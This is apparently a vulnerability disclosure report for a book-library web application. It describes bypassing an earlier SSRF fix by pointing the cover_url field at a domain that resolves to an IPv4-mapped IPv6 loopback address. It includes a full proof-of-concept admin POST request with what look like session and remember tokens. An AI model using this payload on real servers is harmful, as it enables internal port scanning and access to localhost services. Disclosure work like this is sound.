Description

The fix for my previous report (CVE-2022-0767) is still incomplete and could be bypassed via IPV4/IPV4 embedding :

ssrf-ipv4_ipv6.etclab.top will resolve to 0:0:0:0:0:ffff:127.0.0.1

Proof of Concept

POST /admin/book/1 HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------14432334242120559709379867589
Content-Length: 2321
Origin: null
Connection: close
Cookie: session=.eJwljjlqBDEQAP-i2EEf6lZrPzNIfWBjsGFmNzL-uwccVlFB_bSjzrze2-N5vvKtHR_RHs0qZjJR96yaZUwgy0EsCrqJgS60QSTLhDcPBhZzWdRhqMZcIIjqmLHhLntpem1RFew8dUpX9MQ50Rg3aFQAWxF57lyc7R55XXn-3-CNfp11PL8_8-sWPty3EoGbB2YOhF41KPfOSBq9gpRitt8_T24_Fw.YhhiGw.-3BW6pW_7-ch1-BZOwoScsgrPTY; remember_token=1|c03586bceafcfcc3553cf6f7687a8e5568f28f153173472c83b178b3c748a61ffb39953601a75eb9dcc9c91a8fcd3a710feecab8e93530f1781b5734183b391e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="csrf_token"

ImM3Y2NiNjIyMGM4Y2QxZWU3MTA0ZmY3MmViYmVkZTI3NGZkMjYyZDki.YhhiGg.MmwyZBGR24IaeVpO-gVRdjx2vk0
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="book_title"

A Christmas Carol in Prose; Being a Ghost Story of Christmas
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="author_name"

Charles Dickens
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="description"

<p>Test</p>
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="tags"

Christmas stories, Ghost stories, London (England) -- Fiction, Misers -- Fiction, Poor families -- Fiction, Scrooge; Ebenezer (Fictitious character) -- Fiction, Sick children -- Fiction
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="series"


-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="series_index"

1.0
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="rating"


-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="cover_url"

http://ssrf-ipv4_ipv6.etclab.top/
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="btn-upload-cover"; filename=""
Content-Type: application/octet-stream


-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="pubdate"

2004-08-11
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="publisher"


-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="languages"

English
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="btn-upload-format"; filename=""
Content-Type: application/octet-stream


-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="detail_view"

on
-----------------------------14432334242120559709379867589--

Impact

This vulnerability is capable of port scanning and even may execute some actions on the victim's side in case there are sensitive services on localhost.

Patch

I still strongly recommend using the Advocate library instead of requests, it will protect functionality download the remote files from SSRF attacks. for example, even with the fix of this report, you are still vulnerable to DNS-rebinding, and using SSRF Protected libraries like Advocate will solve this problem.